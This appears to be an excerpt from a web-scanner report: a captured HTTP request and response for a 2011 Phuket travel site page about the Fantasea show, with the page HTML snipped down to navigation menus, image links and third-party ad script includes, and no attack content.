Proxy-Connection: keep-alive
Referer: http://www.phuket-travel.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_cc=true; __utmz=221167833.1308921744.1.1.utmcsr=phuket.com|utmccn=(referral)|utmcmd=referral|utmcct=/islands/index.htm; __utma=221167833.643271157.1308921743.1308921743.1308921743.1; __utmc=221167833; __utmb=221167833.1.10.1308921743; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 200 OK
Date: Fri, 24 Jun 2011 13:22:35 GMT
Server: Apache-Coyote/1.1
Vary: Accept-Encoding,User-Agent
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: JSESSIONID=FFABE808D53FBDC157E785A9F775AACA; Path=/
Last-Modified: Mon, 31 May 2010 08:42:38 GMT
Cache-Control: max-age=0
Expires: Fri, 24 Jun 2011 13:22:34 GMT
Content-Length: 234815

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


                                               <html xmlns="http://www.w3.org/1999/x
...[SNIP]...
<link rel="canonical" href="http://www.phuket-travel.com/nightlife/fantasea.htm" />
   <link rel="shortcut icon" href="http://static.asiawebdirect.com/images/favicon.ico" type="image/x-icon">
   <link rel="stylesheet" href="http://static.asiawebdirect.com/portals/css/main.css" type="text/css" media="screen" />
   <link rel="stylesheet" href="http://static.asiawebdirect.com/portals/css/portal.css" type="text/css" media="screen" />
   <link rel="stylesheet" href="http://static.asiawebdirect.com/portals/css/print.css" type="text/css" media="print" />
   <link rel="stylesheet" href="http://static.asiawebdirect.com/portals/css/portals-layout.css" type="text/css" media="screen" />
   <link rel="stylesheet" href="http://static.asiawebdirect.com/portals/js/fancybox/jquery.fancybox-1.3.1.css" type="text/css" media="screen" />
   
   <!--[if IE 8]>
...[SNIP]...
<div id="masthead">
<img src="http://static.asiawebdirect.com/portals/images/logoawd.gif" id="logo" usemap="#map1"></img>
<map name="map1">
<area href="http://www.asiawebdirect.com/" shape="rect" coords="0,0,204,70">
<area href="http://www.phuket-travel.com/" shape="rect" coords="0,71,204,100">
...[SNIP]...
</map>


    <img src="http://static.asiawebdirect.com/m/phuket/portals/phuket-travel-com/homepage/nightlife/headerBannerImages/bannerImage/top-nightlife.jpg" id="top-image" />
<div id="masthead-title">
<img src="http://static.asiawebdirect.com/m/phuket/portals/phuket-travel-com/homepage/nightlife/headerBannerImages/titleImage/phuket-tours.png" id="page-title" style="filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src=/images/title.png, sizingMethod=scale);" />
</div>
...[SNIP]...
<div id="tour-highlights">

   <img src="http://static.asiawebdirect.com/m/phuket/portals/phuket-travel-com/homepage/nightlife/fantasea/highlights/image/fantasea230.jpg" alt="Phuket Fantasea Theme Park" />
   <div class="header">
       <img src="http://static.asiawebdirect.com/portals/images/highlights1.png">
   </div>
   <div class="highlight"><a href="http://www.phuket.com/tours/10mustdo.htm" target="_blank">Voted #2 Phuket Best Tour!</a>
...[SNIP]...
<strong>Read a review of <a target="_blank" href="http://www.phuket.com/magazine/phuket-fantasea.htm">Phuket Fantasea Show</a>
...[SNIP]...
</div>
   <img src="http://static.asiawebdirect.com/m/phuket/portals/phuket-travel-com/homepage/nightlife/fantasea/tourParagraphs/00/image1/fantaseaVIVA.jpg" class="first" />
   <img src="http://static.asiawebdirect.com/m/phuket/portals/phuket-travel-com/homepage/nightlife/fantasea/tourParagraphs/00/image2/fantaseaPALACE.jpg" />
   <img src="http://static.asiawebdirect.com/m/phuket/portals/phuket-travel-com/homepage/nightlife/fantasea/tourParagraphs/00/image3/fantasea-GOLDEN.jpg" />
   
</div>
...[SNIP]...
</div>
   <img src="http://static.asiawebdirect.com/m/phuket/portals/phuket-travel-com/homepage/nightlife/fantasea/tourParagraphs/04/image1/fantasea-suriyamas01.jpg" class="first" />
   <img src="http://static.asiawebdirect.com/m/phuket/portals/phuket-travel-com/homepage/nightlife/fantasea/tourParagraphs/04/image2/fantasea-suriyamas02.jpg" />
   <img src="http://static.asiawebdirect.com/m/phuket/portals/phuket-travel-com/homepage/nightlife/fantasea/tourParagraphs/04/image3/fantasea-suriyamas03.jpg" />
   
</div>
...[SNIP]...
<div class="index-teaser">
   <a target="_blank" href="http://www.asiawebdirect.com/customer/enquiry/?s=8">
       <img class="teaser-image" src="http://static.asiawebdirect.com/images/customize.jpg"/>
   </a>
   <h4><a target="_blank" href="http://www.asiawebdirect.com/customer/enquiry/?s=8">Customizing Your Tour</a>
...[SNIP]...
a typical tour. If it doesn't fit your requirements, do not hesitate to talk to us about your preferences. In most cases, we will be able to customize this tour or package to match your expectations. <a target="_blank" href="http://www.asiawebdirect.com/customer/enquiry/?s=8">Please click here to tell us about your request...</a>
...[SNIP]...
<div id="big-booking-title"><img src="http://static.asiawebdirect.com/portals/images/big-box-logo.gif" />Hotel Quick Finder</div>
...[SNIP]...
</select>

<img class="calendar" src="http://static.asiawebdirect.com/portals/images/calendar.gif" onclick="javascript:prefixYear(1);opencalendar('dd/mm/yyyy',getElcheckavailability('txtCheck_In'),this,'showChangeDate(\'in\');', event.x, event.y);return false;" />

<span>
...[SNIP]...
</select>

<img class="calendar" src="http://static.asiawebdirect.com/portals/images/calendar.gif" onclick="javascript:prefixYear(1);opencalendar('dd/mm/yyyy',getElcheckavailability('txtCheck_Out'),this,'showChangeDate(\'out\');', event.x, event.y);return false;" />

<br>
...[SNIP]...
</div>
               <iframe id="feedbackForm" src="http://www.asiawebdirect.com/forms/portal-feedback.html?page=http://www.phuket-travel.com/nightlife/fantasea.htm" scrolling="no" width="600px" height="370px" frameborder="0"></iframe>
...[SNIP]...
</script>

<script type='text/javascript' src='http://d1.openx.org/spcjs.php?id=5242&amp;block=1'></script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...
</script>

<script type='text/javascript' src='http://d1.openx.org/spcjs.php?id=5242&amp;block=1'></script>
...[SNIP]...
</select><img class="calendar" src="http://static.asiawebdirect.com/portals/images/calendar.gif" width="14" height="16" onclick="javascript:prefixYear(2);opencalendar('dd/mm/yyyy',getElcheckavailabilityShort('txtCheck_InShort'),this,'showChangeDateShort(\'in\');', event.x, event.y);return false;" size="10" /><br />
...[SNIP]...
</select><img class="calendar" src="http://static.asiawebdirect.com/portals/images/calendar.gif" width="14" height="16" onclick="javascript:prefixYear(2);opencalendar('dd/mm/yyyy',getElcheckavailabilityShort('txtCheck_OutShort'),this,'showChangeDateShort(\'out\');', event.x, event.y);return false;" size="10" /><br />
...[SNIP]...
<a class="current-section" href="http://www.phuket-travel.com/nightlife/fantasea.htm" >Phuket Fantasea <img src="http://static.asiawebdirect.com/images/thumbsup.gif" class="centeredImage"/></a>
...[SNIP]...
<a class="current-section" href="http://www.phuket-travel.com/nightlife/sky-high.htm" >Sky High Party Boat <img src="http://static.asiawebdirect.com/images/new.gif"/></a>
...[SNIP]...
</ul>

           
                                                           <a href="http://www.latestays.com/" target="_blank"><img width="184" height="56" border="0" src="http://www.images.awd.ws/ads/global/remnant/latestays184x56.gif"></a>
...[SNIP]...
<li><a class="hotel" href="http://www.phuket.com/tours/10mustdo.htm" ><strong>
...[SNIP]...
<li><a class="level2" href="http://www.phuket.com/hotels-packages/phi-phi-islands-stopover.htm" >Phi Phi Islands Stopover <img src="http://static.asiawebdirect.com/images/new.gif"></a>
...[SNIP]...
<li><a class="level2" href="http://www.phuket.com/hotels-packages/phi-phi-islands-leisure.htm" >Phi Phi Islands Leisure <img src="http://static.asiawebdirect.com/images/new.gif"></a>
...[SNIP]...
<li><a class="hotel" href="http://www.phuket.com/carrent/thairentacar.htm" target="_blank">Car Rental</a>
...[SNIP]...
<a class="level2" href="http://www.phuket-travel.com/speedboat/phiphi.htm" >Phi Phi by Speedboat <img src="http://static.asiawebdirect.com/images/thumbsup.gif" class="centeredImage"/></a>
...[SNIP]...
<a class="level2" href="http://www.phuket-travel.com/kayaking/starlight.htm" >Hong by Starlights <img src="http://static.asiawebdirect.com/images/thumbsup.gif" class="centeredImage"/></a>
...[SNIP]...
<a class="level2" href="http://www.phuket-travel.com/cruises/junebahtra.htm" >June Bahtra Cruise <img src="http://static.asiawebdirect.com/images/thumbsup.gif" class="centeredImage"/></a>
...[SNIP]...
<li><a class="level2" href="http://www.diving.phuket.com/liveaboard/index.htm" >Similans Liveaboards</a>
...[SNIP]...
<a class="level2" href="http://www.phuket-travel.com/water_ac/index-rafting.htm" >White Water Rafting <img src="http://static.asiawebdirect.com/images/thumbsup.gif" class="centeredImage"/></a>
...[SNIP]...
<a class="level2" href="http://www.phuket-travel.com/eco_tour/elephanthills.htm" >Elephant Hills Safari <img src="http://static.asiawebdirect.com/images/thumbsup.gif" class="centeredImage"/></a>
...[SNIP]...
<a class="level2" href="http://www.phuket-travel.com/speedboat/phiphi.htm" >Phi Phi by Speedboat <img src="http://static.asiawebdirect.com/images/thumbsup.gif" class="centeredImage"/></a>
...[SNIP]...
<a class="level2" href="http://www.phuket-travel.com/kayaking/starlight.htm" >Hong by Starlight <img src="http://static.asiawebdirect.com/images/thumbsup.gif" class="centeredImage"/></a>
...[SNIP]...
<a class="level2" href="http://www.phuket-travel.com/nightlife/sky-high.htm" >Sky High Party Boat <img src="http://static.asiawebdirect.com/images/new.gif"/></a>
...[SNIP]...
<a class="current-section" href="http://www.phuket-travel.com/water_ac/index-rafting.htm" >White Water Rafting <img src="http://static.asiawebdirect.com/images/thumbsup.gif" class="centeredImage"/></a>
...[SNIP]...
<a class="level2" href="http://www.phuket-travel.com/golf/bluecanyon.htm" >Blue Canyon <img src="http://static.asiawebdirect.com/images/thumbsup.gif" class="centeredImage"/></a>
...[SNIP]...
<a class="level2" href="http://www.phuket-travel.com/eco_tour/in_phuket.htm" >4-in-1 Safari Tour <img src="http://static.asiawebdirect.com/images/thumbsup.gif" class="centeredImage"/></a>
...[SNIP]...
<a class="level2" href="http://www.phuket-travel.com/eco_tour/elephanthills.htm" >Elephant Hills Safari <img src="http://static.asiawebdirect.com/images/thumbsup.gif" class="centeredImage"/></a>
...[SNIP]...
<a class="level2" href="http://www.phuket-travel.com/sport/atv-tours.htm" >ATV Tours <img src="http://static.asiawebdirect.com/images/thumbsup.gif" class="centeredImage"/></a>
...[SNIP]...
<a class="level2" href="http://www.phuket-travel.com/nightlife/fantasea.htm" >Phuket Fantasea Show <img src="http://static.asiawebdirect.com/images/thumbsup.gif" class="centeredImage"/></a>
...[SNIP]...
<a class="level2" href="http://www.phuket-travel.com/discover-phuket/phuket-halfday-tour.htm" >Phuket Island & City Tour <img src="http://static.asiawebdirect.com/images/thumbsup.gif" class="centeredImage"/></a>
...[SNIP]...
<li><a class="level2" href="http://www.phuket.com/hotel/recommendations-spa-resorts.htm" >Top 10 Spa Resorts</a>
...[SNIP]...
<a class="current-section-arrow" href="http://www.phuket-travel.com/restaurant-offers/" >Restaurant Offers <img src="http://static.asiawebdirect.com/images/new.gif"></a>
...[SNIP]...
<li><a class="current-section-child" href="http://www.asiawebdirect.com/termsandconditions-tours.htm" target="_blank">Terms & Conditions</a>
...[SNIP]...
<p><img width="183" height="20" alt="" src="http://static.asiawebdirect.com/m/phuket/portals/phuket-travel-com/siteMenus/0/txthtmlText_files/file/183x20.png" /></p>
...[SNIP]...
<li><a class="menutitle" href="http://www.phuket.com/hotels/" >Phuket Hotels</a>
...[SNIP]...
<li><a class="hotel" href="http://www.phuket.com/hotels/super-saver.htm" ><b>
...[SNIP]...
<li><a class="hotel-arrow" href="http://www.phuket.com/hotels-packages/phi-phi-islands-stopover.htm" ><i>
...[SNIP]...
<li><a class="level2" href="http://www.phuket.com/hotels-packages/phi-phi-islands-stopover.htm" >Phi Phi Islands Stopover <img src="http://static.asiawebdirect.com/images/new.gif"></a>
...[SNIP]...
<li><a class="level2" href="http://www.phuket.com/hotels-packages/phi-phi-islands-leisure.htm" >Phi Phi Islands Leisure <img src="http://static.asiawebdirect.com/images/new.gif"></a>
...[SNIP]...
<li><a class="level2" href="http://www.phuket.com/hotels-packages/phuket-discovery.htm" >Phuket Discovery Package</a>
...[SNIP]...
<li><a class="hotel-arrow" href="http://www.phuket.com/toptenhotels.htm" ><b>
...[SNIP]...
</b><img src="http://static.asiawebdirect.com/images/hot.gif"/></a>
   <ul>
   
       
<li><a class="level2" href="http://www.phuket.com/toptenhotels.htm" ><b>
...[SNIP]...
<li><a class="level2" href="http://www.phuket.com/hotel/recommendations-luxury-resorts.htm" >TOP 10 Luxury Resorts</a>
...[SNIP]...
<li><a class="level2" href="http://www.phuket.com/hotel/recommendations-beach-resorts.htm" >TOP 10 Beach Resorts</a>
...[SNIP]...
<li><a class="level2" href="http://www.phuket.com/hotel/recommendations-family-resorts.htm" >TOP 10 Family Resorts</a>
...[SNIP]...
<li><a class="level2" href="http://www.phuket.com/hotel/recommendations-romantic-resorts.htm" >TOP 10 Romantic Resorts</a>
...[SNIP]...
<li><a class="level2" href="http://www.phuket.com/hotel/recommendations-spa-resorts.htm" >TOP 10 Spa Resorts</a>
...[SNIP]...
<li><a class="level2" href="http://www.phuket.com/hotel/recommendations-budget-hotels.htm" >TOP 10 Budget Hotels</a>
...[SNIP]...
<li><a class="level2" href="http://www.phuket.com/hotel/recommendations-boutique-resorts.htm" >TOP 10 Boutique Resorts</a>
...[SNIP]...
<li><a class="level2" href="http://www.phuket.com/hotel/recommendations-gourmet-resorts.htm" >TOP 10 Gourmet Resorts</a>
...[SNIP]...
<li><a class="level2" href="http://www.phuket.com/hotel/recommendations-pool-villas.htm" >TOP 10 Phuket Pool Villas</a>
...[SNIP]...
<li><a class="hotel-arrow" href="http://www.phuket.com/where-to-stay.htm" >Editor's Guide to Best Hotels</a>
...[SNIP]...
<li><a class="level2" href="http://www.phuket.com/island/hotels-bangtao.htm" >Where to Stay in Bang Tao</a>
...[SNIP]...
<li><a class="level2" href="http://www.phuket.com/island/hotels-karon.htm" >Where to Stay in Karon</a>
...[SNIP]...
<li><a class="level2" href="http://www.phuket.com/island/hotels-kata.htm" >Where to Stay in Kata Beach</a>
...[SNIP]...
<li><a class="level2" href="http://www.phuket.com/island/hotels-patong.htm" >Where to Stay in Patong</a>
...[SNIP]...
<li><a class="hotel-arrow" href="http://www.latestays.com/thailand-phuket/" target="_blank">LAST MINUTE OFFERS</a>
...[SNIP]...
<li><a class="level2" href="http://www.latestays.com/thailand-phuket-bang_tao/" target="_blank">Bangtao Beach</a>
...[SNIP]...
<li><a class="level2" href="http://www.latestays.com/thailand-phuket-karon_beach/" target="_blank">Karon Beach</a>
...[SNIP]...
<li><a class="level2" href="http://www.latestays.com/thailand-phuket-kata_beach/" target="_blank">Kata Beach</a>
...[SNIP]...
<li><a class="level2" href="http://www.latestays.com/thailand-phuket-patong_beach/" target="_blank">Patong Beach</a>
...[SNIP]...
<li><a class="hotel" href="http://www.phuket.com/hotels/preferred-hotels.htm" >Recommended Hotels!</a>
...[SNIP]...
<li><a class="menutitle-arrow" href="http://www.phuket.com/hotels/" >Hotels by Location</a>
...[SNIP]...
<li><a class="level2" href="http://www.phuket.com/hotels-phuket.htm" >BEST DEALS by LOCATION</a>
...[SNIP]...
<li><a class="level2" href="http://www.phuket.com/hotel/ao-por.htm" >Ao Por</a>
...[SNIP]...
<li><a class="level2" href="http://www.phuket.com/hotel/bang-tao.htm" >Bang Tao Beach</a>
...[SNIP]...
<li><a class="level2" href="http://www.phuket.com/hotel/panwa-beach.htm" >Cape Panwa</a>
...[SNIP]...
<li><a class="level2" href="http://www.phuket.com/hotel/chalong-bay.htm" >Chalong Bay</a>
...[SNIP]...
<li><a class="level2" href="http://www.phuket.com/hotel/kamala-beach.htm" >Kamala Beach</a>
...[SNIP]...
<li><a class="level2" href="http://www.phuket.com/hotel/karon-beach.htm" >Karon Beach Hotels</a>
...[SNIP]...
<li><a class="level2" href="http://www.phuket.com/hotel/kata-beach.htm" >Kata Beach Hotels</a>
...[SNIP]...
<li><a class="level2" href="http://www.phuket.com/hotel/kata-beach.htm" >Kata Noi Beach</a>
...[SNIP]...
<li><a class="level2" href="http://www.phuket.com/hotel/mai-khao.htm" >Mai Khao Beach</a>
...[SNIP]...
<li><a class="level2" href="http://www.phuket.com/hotel/nai-harn.htm" >Nai Harn Beach</a>
...[SNIP]...
<li><a class="level2" href="http://www.phuket.com/hotel/nai-thon.htm" >Nai Thon Beach</a>
...[SNIP]...
<li><a class="level2" href="http://www.phuket.com/hotel/nai-yang.htm" >Nai Yang Beach</a>
...[SNIP]...
<li><a class="level2" href="http://www.phuket.com/hotel/airport.htm" >Nearby Phuket Airport</a>
...[SNIP]...
<li><a class="level2" href="http://www.phuket.com/hotel/other-areas.htm" >Other Areas</a>
...[SNIP]...
<li><a class="level2" href="http://www.phuket.com/hotel/patong-beach.htm" >Patong Beach Hotels</a>
...[SNIP]...
<li><a class="level2" href="http://www.phuket.com/hotel/phi-phi-and-islands.htm" >Phi Phi Island</a>
...[SNIP]...
<li><a class="level2" href="http://www.phuket.com/hotel/phuket-town.htm" >Phuket Town</a>
...[SNIP]...
<li><a class="level2" href="http://www.phuket.com/hotel/rawai.htm" >Rawai Beach</a>
...[SNIP]...
<li><a class="level2" href="http://www.phuket.com/hotel/surin-beach.htm" >Surin Beach</a>
...[SNIP]...
<li><a class="menutitle-arrow" href="http://www.phuket.com/hotel/name.htm" >All Hotels Sorted by</a>
...[SNIP]...
<li><a class="level2" href="http://www.phuket.com/hotel/name.htm" >Hotels by Name</a>
...[SNIP]...
<li><a class="level2" href="http://www.phuket.com/hotel/price.htm" >Hotels by Price</a>
...[SNIP]...
<li><a class="level2" href="http://www.phuket.com/hotel/location.htm" >Hotels by Location</a>
...[SNIP]...
<li><a class="level2" href="http://www.phuket-maps.com/" >Hotels on Map</a>
...[SNIP]...
<li><a class="level2-arrow" href="http://www.phuket.com/hotel/price.htm" >Hotels by Range</a>
...[SNIP]...
<li><a class="level3" href="http://www.phuket.com/hotel/budget-hotels.htm" >Budget Hotels</a>
...[SNIP]...
<li><a class="level3" href="http://www.phuket.com/hotel/affordable-hotels.htm" >Affordable Hotels</a>
...[SNIP]...
<li><a class="level3" href="http://www.phuket.com/hotel/mid-range-hotels.htm" >Mid Range Hotels</a>
...[SNIP]...
<li><a class="level3" href="http://www.phuket.com/hotel/5-star-hotels.htm" >Luxury Hotels</a>
...[SNIP]...
<li><a class="level2" href="http://www.phuket.com/hotels/new-hotels.htm" >New Hotels</a>
...[SNIP]...
<li><a class="level2-arrow" href="http://www.phuket.com/hotel/beach-resort.htm" >Resorts</a>
...[SNIP]...
<li><a class="level3" href="http://www.phuket.com/hotel/beach-resort.htm" >Beachfront Resorts</a>
...[SNIP]...
<li><a class="level3" href="http://www.phuket.com/hotel/boutique-hotels.htm" >Boutique Resorts</a>
...[SNIP]...
<li><a class="level3" href="http://www.phuket.com/hotel/family-resort.htm" >Family Resorts</a>
...[SNIP]...
<li><a class="level3" href="http://www.phuket.com/hotel/golf-resort.htm" >Golf Resorts</a>
...[SNIP]...
<li><a class="level3" href="http://www.phuket.com/hotel/hideaway-resort.htm" >Hideaway Resorts</a>
...[SNIP]...
<li><a class="level3" href="http://www.phuket.com/hotel/island-resort.htm" >Island Resorts</a>
...[SNIP]...
<li><a class="level3" href="http://www.phuket.com/hotel/spa-resort.htm" >Spa Resorts</a>
...[SNIP]...
<li><a class="level2-arrow" href="http://www.phuket.com/hotel/villas.htm" >Villas & Bungalows</a>
...[SNIP]...
<li><a class="level3" href="http://www.phuket.com/hotel/bungalows.htm" >Bungalows in Phuket </a>
...[SNIP]...
<li><a class="level3" href="http://www.phuket.com/hotel/apartments.htm" >Apartments in Phuket</a>
...[SNIP]...
<li><a class="level3" href="http://www.phuket.com/property/property.htm" >Phuket Villa Rentals</a>
...[SNIP]...
<li><a class="level3" href="http://www.phuket.com/hotel/villas.htm" >Villas in Hotels</a>
...[SNIP]...
<li>
   <a class="menutitle-arrow" href="http://www.phuket.com/top10.htm" >Top 10 Everything!</a>
...[SNIP]...
<li><a class="level2" href="http://www.phuket.com/island/10mustsee.htm" >10 Must See in Phuket</a>
...[SNIP]...
<li><a class="level2" href="http://www.phuket.com/tours/10mustdo.htm" >Top 10 Best Tours</a>
...[SNIP]...
<li><a class="level2" href="http://www.phuket.com/island/10mustsee_beyond.htm" >Top 10 Tours Beyond Phuket</a>
...[SNIP]...
<li><a class="level2" href="http://www.phuket.com/magazine/thai-funny-things.htm" >10 Funny Things in Phuket</a>
...[SNIP]...
<li><a class="level2" href="http://www.phuket.com/cuisine/toptenfood.htm" >Top 10 Thai Food</a>
...[SNIP]...
<li><a class="level2" href="http://www.phuket.com/activities/rainy.htm" >10 Rainy Day Activities</a>
...[SNIP]...
<li>
   <a class="menutitle-arrow" href="http://www.phuket.com/island/beaches.htm" >Phuket Beaches & Towns</a>
...[SNIP]...
<li><a class="level2" href="http://www.phuket.com/island/ao-sane-beach.htm" >Ao Sane Beach</a>
...[SNIP]...
<li><a class="level2" href="http://www.phuket.com/island/ao-yon-beach.htm" >Ao Yon Beach</a>
...[SNIP]...
<li><a class="level2" href="http://www.phuket.com/island/banana-rock-beach.htm" >Banana Rock Beach</a>
...[SNIP]...
<li><a class="level2-arrow" href="http://www.phuket.com/island/beaches_bangtao.htm" ><strong>
...[SNIP]...
<li><a class="level3" href="http://www.phuket.com/hotel/bang-tao.htm" >Bangtao Beach Hotels</a>
...[SNIP]...
<li><a class="level3" href="http://www.phuket.com/island/bangtao-beach.htm" >The Beach of Bangtao</a>
...[SNIP]...
<li><a class="level3" href="http://www.phuket.com/attractions/bangtao-attractions.htm" >Bangtao Beach Attractions</a>
...[SNIP]...
<li><a class="level3" href="http://www.phuket.com/dining/bangtao.htm" >Bangtao Beach Restaurants</a>
...[SNIP]...
<li><a class="level3" href="http://www.phuket.com/nightlife/bang-tao.htm" >Bangtao Beach Nightlife</a>
...[SNIP]...
<li><a class="level3" href="http://www.phuket.com/shopping/bangtao-kamala.htm" >Bangtao Beach Shopping</a>
...[SNIP]...
<li><a class="level3" href="http://www.phuket.com/activities/bangtao-activities.htm" >Bangtao Beach Activities</a>
...[SNIP]...
<li><a class="level3" href="http://www.phuket-maps.com/bangtao.htm" >Bangtao Beach Map</a>
...[SNIP]...
<li><a class="level2" href="http://www.phuket.com/island/cape-panwa.htm" >Cape Panwa</a>
...[SNIP]...
<li><a class="level2-arrow" href="http://www.phuket.com/island/beaches_chalong.htm" ><strong>
...[SNIP]...
<li><a class="level3" href="http://www.phuket.com/attractions/chalong-attractions.htm" >Chalong Bay Attractions</a>
...[SNIP]...
<li><a class="level3" href="http://www.phuket.com/dining/chalong.htm" >Chalong Bay Restaurants</a>
...[SNIP]...
<li><a class="level3" href="http://www.phuket.com/nightlife/chalong_rawai.htm" >Chalong Bay Nightlife</a>
...[SNIP]...
<li><a class="level3" href="http://www.phuket.com/shopping/chalong-shopping.htm" >Chalong Bay Shopping</a>
...[SNIP]...
<li><a class="level3" href="http://www.phuket.com/chalong-bay/activities.htm" >Chalong Bay Activities</a>
...[SNIP]...
<li><a class="level3" href="http://www.phuket-maps.com/chalong.htm" >Chalong Bay Map</a>
...[SNIP]...
<li><a class="level2" href="http://www.phuket.com/island/emerald-beach.htm" >Emerald Beach</a>
...[SNIP]...
<li><a class="level2-arrow" href="http://www.phuket.com/island/beaches_kamala.htm" ><strong>
...[SNIP]...
<li><a class="level3" href="http://www.phuket.com/hotel/kamala-beach.htm" >Kamala Beach Hotels</a>
...[SNIP]...
<li><a class="level3" href="http://www.phuket.com/island/kamala-beach.htm" >The Beach of Kamala</a>
...[SNIP]...
<li><a class="level3" href="http://www.phuket.com/attractions/kamala-attractions.htm" >Kamala Beach Attractions</a>
...[SNIP]...
<li><a class="level3" href="http://www.phuket.com/dining/kamala.htm" >Kamala Beach Restaurants</a>
...[SNIP]...
<li><a class="level3" href="http://www.phuket.com/nightlife/kamala-beach.htm" >Kamala Beach Nightlife</a>
...[SNIP]...
<li><a class="level3" href="http://www.phuket.com/shopping/kamala-shopping.htm" >Kamala Beach Shopping</a>
...[SNIP]...
<li><a class="level3" href="http://www.phuket.com/activities/kamala-activities.htm" >Kamala Beach Activities</a>
...[SNIP]...
<li><a class="level3" href="http://www.phuket-maps.com/kamala.htm" >Kamala Beach Map</a>
...[SNIP]...
<li><a class="level2-arrow" href="http://www.phuket.com/island/beaches_karon.htm" ><strong>
...[SNIP]...
<li><a class="level3" href="http://www.phuket.com/hotel/karon-beach.htm" >Karon Beach Hotels</a>
...[SNIP]...
<li><a class="level3" href="http://www.phuket.com/island/karon-beach.htm" >The Beach of Karon</a>
...[SNIP]...
<li><a class="level3" href="http://www.phuket.com/attractions/karon-attractions.htm" >Karon Beach Attractions</a>
...[SNIP]...
<li><a class="level3" href="http://www.phuket.com/dining/karon.htm" >Karon Beach Restaurants</a>
...[SNIP]...
<li><a class="level3" href="http://www.phuket.com/nightlife/karon-beach.htm" >Karon Beach Nightlife</a>
...[SNIP]...
<li><a class="level3" href="http://www.phuket.com/shopping/karon-shopping.htm" >Karon Beach Shopping</a>
...[SNIP]...
<li><a class="level3" href="http://www.phuket.com/activities/karon-activities.htm" >Karon Beach Activities</a>
...[SNIP]...
<li><a class="level3" href="http://www.phuket-maps.com/karon.htm" >Karon Beach Map</a>
...[SNIP]...
<li><a class="level2-arrow" href="http://www.phuket.com/island/beaches_kata.htm" ><strong>
...[SNIP]...
<li><a class="level3" href="http://www.phuket.com/hotel/kata-beach.htm" >Kata Beach Hotels</a>
...[SNIP]...
<li><a class="level3" href="http://www.phuket.com/island/kata-beach.htm" >The Beach of Kata</a>
...[SNIP]...
<li><a class="level3" href="http://www.phuket.com/attractions/kata-attractions.htm" >Kata Beach Attractions</a>
...[SNIP]...
<li><a class="level3" href="http://www.phuket.com/dining/kata.htm" >Kata Beach Restaurants</a>
...[SNIP]...
<li><a class="level3" href="http://www.phuket.com/nightlife/kata-beach.htm" >Kata Beach Nightlife</a>
...[SNIP]...
<li><a class="level3" href="http://www.phuket.com/shopping/kata-karon-shopping.htm" >Kata Beach Shopping</a>
...[SNIP]...
<li><a class="level3" href="http://www.phuket.com/activities/kata-activities.htm" >Kata Beach Activities</a>
...[SNIP]...
<li><a class="level3" href="http://www.phuket-maps.com/kata.htm" >Kata Beach Map</a>
...[SNIP]...
<li><a class="level2" href="http://www.phuket.com/island/beaches_katanoi.htm" >Kata Noi Beach</a>
...[SNIP]...
<li><a class="level2" href="http://www.phuket.com/island/laem-ka-beach.htm" >Laem Ka Beach</a>
...[SNIP]...
<li><a class="level2" href="http://www.phuket.com/island/beaches_laemsingh.htm" >Laem Singh Beach</a>
...[SNIP]...
<li><a class="level2-arrow" href="http://www.phuket.com/island/mai-khao-beach.htm" ><strong>
...[SNIP]...
<li><a class="level3" href="http://www.phuket.com/hotel/mai-khao.htm" >Mai Khao Beach Hotels</a>
...[SNIP]...
<li><a class="level3" href="http://www.phuket.com/attractions/maikhao-attractions.htm" >Mai Khao Beach Attractions</a>
...[SNIP]...
<li><a class="level3" href="http://www.phuket.com/dining/mai-khao.htm" >Mai Khao Beach Restaurants</a>
...[SNIP]...
<li><a class="level3" href="http://www.phuket.com/shopping/maikhao-shopping.htm" >Mai Khao Beach Shopping</a>
...[SNIP]...
<li><a class="level3" href="http://www.phuket.com/activities/maikhao-activities.htm" >Mai Khao Beach Activities</a>
...[SNIP]...
<li><a class="level3" href="http://www.phuket-maps.com/maikhao-beach.htm" >Mai Khao Beach Map</a>
...[SNIP]...
<li><a class="level2-arrow" href="http://www.phuket.com/island/beaches_nai_harn.htm" ><strong>
...[SNIP]...
<li><a class="level3" href="http://www.phuket.com/hotel/nai-harn.htm" >Nai Harn Beach Hotels</a>
...[SNIP]...
<li><a class="level3" href="http://www.phuket.com/island/naiharn-beach.htm" >The Beach of Nai Harn</a>
...[SNIP]...
<li><a class="level3" href="http://www.phuket.com/attractions/nai-harn-attractions.htm" >Nai Harn Beach Attractions</a>
...[SNIP]...
<li><a class="level3" href="http://www.phuket.com/dining/naiharn.htm" >Nai Harn Beach Restaurants</a>
...[SNIP]...
<li><a class="level3" href="http://www.phuket.com/nightlife/naiharn.htm" >Nai Harn Beach Nightlife</a>
...[SNIP]...
<li><a class="level3" href="http://www.phuket.com/shopping/nai-harn-shopping.htm" >Nai Harn Beach Shopping</a>
...[SNIP]...
<li><a class="level3" href="http://www.phuket.com/activities/nai-harn-activities.htm" >Nai Harn Beach Activities</a>
...[SNIP]...
<li><a class="level3" href="http://www.phuket-maps.com/naiharn-beach.htm" >Nai Harn Beach Map</a>
...[SNIP]...
<li><a class="level2-arrow" href="http://www.phuket.com/island/beaches_naithon.htm" ><strong>
...[SNIP]...
<li><a class="level3" href="http://www.phuket.com/hotel/nai-thon.htm" >Nai Thon Beach Hotels</a>
...[SNIP]...
<li><a class="level3" href="http://www.phuket.com/island/naithon-beach.htm" >The Beach of Nai Thon</a>
...[SNIP]...
<li><a class="level3" href="http://www.phuket-maps.com/naithon-beach.htm" >Nai Thon Beach Map</a>
...[SNIP]...
<li><a class="level2-arrow" href="http://www.phuket.com/island/beaches_naiyang_airport.htm" ><strong>
...[SNIP]...
<li><a class="level3" href="http://www.phuket.com/hotel/nai-yang.htm" >Nai Yang Beach Hotels</a>
...[SNIP]...
